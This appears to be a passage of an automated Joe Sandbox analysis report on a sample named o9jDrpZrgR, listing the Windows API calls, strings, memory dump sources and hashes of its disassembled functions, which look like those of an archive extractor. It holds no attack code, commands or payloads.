                                                              • Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5d46d32073bc188561c9a73be285a763e7ae00276808c2592281e5d6c5c78d05
                                                              • Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
                                                              • Opcode Fuzzy Hash: 5d46d32073bc188561c9a73be285a763e7ae00276808c2592281e5d6c5c78d05
                                                              • Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 143222d1ddb1cbd9287008e432e614e84e7569fd215544bfb86d5cf58bc6cb5d
                                                              • Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
                                                              • Opcode Fuzzy Hash: 143222d1ddb1cbd9287008e432e614e84e7569fd215544bfb86d5cf58bc6cb5d
                                                              • Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: d37b34f490c3c86e8db3f10d536d9aae0da9fb7ba38d75140a14f96e17b8054d
                                                              • Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
                                                              • Opcode Fuzzy Hash: d37b34f490c3c86e8db3f10d536d9aae0da9fb7ba38d75140a14f96e17b8054d
                                                              • Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E580
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4fd68d9e3ddf0626785dfd33f5d204628e0795c8dfebf71324ffd2ab06af2751
                                                              • Instruction ID: 5c6e8884ea4323e29c375b18d5f52606ff150892b06eb48b83f2d0dcaeb446b0
                                                              • Opcode Fuzzy Hash: 4fd68d9e3ddf0626785dfd33f5d204628e0795c8dfebf71324ffd2ab06af2751
                                                              • Instruction Fuzzy Hash: 30A011C22A800ABC3808B2A22C02C3B0A0CE0C2B2833A882EF822C02C2BC8008000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E580
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 29b118bf5e7c7bed4873401cd58fdda8656674dbf5ccd49750665606c9842575
                                                              • Instruction ID: 5c6e8884ea4323e29c375b18d5f52606ff150892b06eb48b83f2d0dcaeb446b0
                                                              • Opcode Fuzzy Hash: 29b118bf5e7c7bed4873401cd58fdda8656674dbf5ccd49750665606c9842575
                                                              • Instruction Fuzzy Hash: 30A011C22A800ABC3808B2A22C02C3B0A0CE0C2B2833A882EF822C02C2BC8008000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E51F
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0c23412227f4f15787156aae3bdafa3afed3e79236f356a2e75f0ce98e774050
                                                              • Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
                                                              • Opcode Fuzzy Hash: 0c23412227f4f15787156aae3bdafa3afed3e79236f356a2e75f0ce98e774050
                                                              • Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E51F
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5d9dbad5512f499f9aa93fec4168f04bc4dd4c814de738f1feb698e80ce5f5ee
                                                              • Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
                                                              • Opcode Fuzzy Hash: 5d9dbad5512f499f9aa93fec4168f04bc4dd4c814de738f1feb698e80ce5f5ee
                                                              • Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E51F
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e478f0000614973403e7a91308b306e6f85894453deda0f1daa66eb62d1cf2d7
                                                              • Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
                                                              • Opcode Fuzzy Hash: e478f0000614973403e7a91308b306e6f85894453deda0f1daa66eb62d1cf2d7
                                                              • Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E51F
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b77b1d3b916890995177ce5d37c6e80960b768898393adaa51c22e95c59f031f
                                                              • Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
                                                              • Opcode Fuzzy Hash: b77b1d3b916890995177ce5d37c6e80960b768898393adaa51c22e95c59f031f
                                                              • Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E580
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 6388cef8006a180090485097d70c54412326fdf58760735b16a97d0346d78787
                                                              • Instruction ID: c88cbe3c88ae0304452ea2fc4d4e6ad3a715d1adba6bb0ddd27ff3b4a4ac8014
                                                              • Opcode Fuzzy Hash: 6388cef8006a180090485097d70c54412326fdf58760735b16a97d0346d78787
                                                              • Instruction Fuzzy Hash: FDA011C22A80083C3808B2A22C02C3B0A0CE0E2B2A33A822EF820E02C2BC8008000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetEndOfFile.KERNELBASE(?,0088903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00889F0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File
                                                              • String ID:
                                                              • API String ID: 749574446-0
                                                              • Opcode ID: c8b02d97def9a618b603dc8c7ebece720a0b919260c8d6e7ffcedf10f6fbf09a
                                                              • Instruction ID: 462386f9651451af1f7076706226530e846d4f7deed9a49e166e411835fd5647
                                                              • Opcode Fuzzy Hash: c8b02d97def9a618b603dc8c7ebece720a0b919260c8d6e7ffcedf10f6fbf09a
                                                              • Instruction Fuzzy Hash: FDA0113008080A8B8E002B30CA0800C3B20FB20BC030202A8A00ACA0A2CB22880B8A00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,0089AE72,C:\Users\user\Desktop,00000000,008C946A,00000006), ref: 0089AC08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 703e56fd7e5db259d02bf7e40a4962e6f26c419e9759ba01995074db69bf0935
                                                              • Instruction ID: 2a7e4d5ff0e7b202bf5b4cab9f423ee2f1b085b77511001da250f3ec035ee7c6
                                                              • Opcode Fuzzy Hash: 703e56fd7e5db259d02bf7e40a4962e6f26c419e9759ba01995074db69bf0935
                                                              • Instruction Fuzzy Hash: C3A01130200200AB83000B328F0AA0EBBAABFA2B00F00C028B00080030CB30C820AA00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0089C2B1
                                                              • EndDialog.USER32(?,00000006), ref: 0089C2C4
                                                              • GetDlgItem.USER32(?,0000006C), ref: 0089C2E0
                                                              • SetFocus.USER32(00000000), ref: 0089C2E7
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0089C321
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0089C358
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0089C36E
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0089C38C
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0089C39C
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0089C3B8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0089C3D4
                                                              • _swprintf.LIBCMT ref: 0089C404
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0089C417
                                                              • FindClose.KERNEL32(00000000), ref: 0089C41E
                                                              • _swprintf.LIBCMT ref: 0089C477
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0089C48A
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0089C4A7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0089C4C7
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0089C4D7
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0089C4F1
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0089C509
                                                              • _swprintf.LIBCMT ref: 0089C535
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0089C548
                                                              • _swprintf.LIBCMT ref: 0089C59C
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0089C5AF
                                                                • Part of subcall function 0089AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0089AF35
                                                                • Part of subcall function 0089AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008BE72C,?,?), ref: 0089AF84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                              • API String ID: 797121971-1840816070
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00886FAA
                                                              • _wcslen.LIBCMT ref: 00887013
                                                              • _wcslen.LIBCMT ref: 00887084
                                                                • Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
                                                                • Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
                                                                • Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00
                                                                • Part of subcall function 0088A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641,000000FF), ref: 0088A1F1
                                                                • Part of subcall function 0088A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641), ref: 0088A21F
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00887139
                                                              • CloseHandle.KERNEL32(00000000), ref: 00887155
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00887298
                                                                • Part of subcall function 00889DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008873BC,?,?,?,00000000), ref: 00889DBC
                                                                • Part of subcall function 00889DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00889E70
                                                                • Part of subcall function 00889620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,008895D6,?,?,?,?,?,008B2641,000000FF), ref: 0088963B
                                                                • Part of subcall function 0088A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501
                                                                • Part of subcall function 0088A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 2821348736-3508440684
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: H_prolog_swprintf
                                                              • String ID: CMT$h%u$hc%u
                                                              • API String ID: 146138363-3282847064
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00882874
                                                              • _strlen.LIBCMT ref: 00882E3F
                                                                • Part of subcall function 008902BA: __EH_prolog.LIBCMT ref: 008902BF
                                                                • Part of subcall function 00891B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0088BAE9,00000000,?,?,?,0001042C), ref: 00891BA0
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00882F91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 1206968400-2756464174
                                                              Uniqueness

